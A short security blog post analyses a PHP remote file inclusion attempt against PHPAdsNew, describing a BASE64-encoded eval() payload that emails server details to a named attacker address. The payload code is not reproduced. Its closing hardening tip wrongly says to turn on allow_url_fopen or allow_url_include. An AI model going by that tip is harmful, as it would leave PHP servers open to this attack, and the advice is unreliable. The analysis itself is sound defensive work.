We decided to take a look at a bunch of different exploitation attemps that are thrown at our site every single day. Aside from the normal SQL-injection attemps we usually see a bigger bunch of various PHP remote file inclusion (RFI) attemps, so lets take a close look at one of them. We’ll omit the actual URL from the blog, suffice to say that the attacker tried to find a vulnerable PHPAdsNew installation.
So, we downloaded the URL that they tried to include:
RFI exploit
Pretty easy to spot that it’s BASE64 encoded. The decoded contents will be passed to eval() which then executes the code. Let’s take a look at the decoded exploit:
So, there’s still a small portion that is BASE64 encoded, but let’s see what the other parts do. You can see the script building a few string based on data it can get from the PHP environment, like the hostname of the server and whether the safe mode is on. It’ll will then send the data onwards to somewhere. The recipient address is still encoded and after decoding we can see that the recipient is:
fr33sh3ll@gmail.com
So, when ever the automated scripts the attacker is using successfully exploits a RFI vulnerable site the attacker will get an e-mail showing the vulnerable site and URL. That way he/she can later on pick a server from the e-mails and do about anything he/she wants.
There are several ways to make such attacks much harder to perform, like turning on the safe mode or toggling on the allow_url_fopen or allow_url_include (in some versions of php). More good/better tricks can be found for example on these two sites: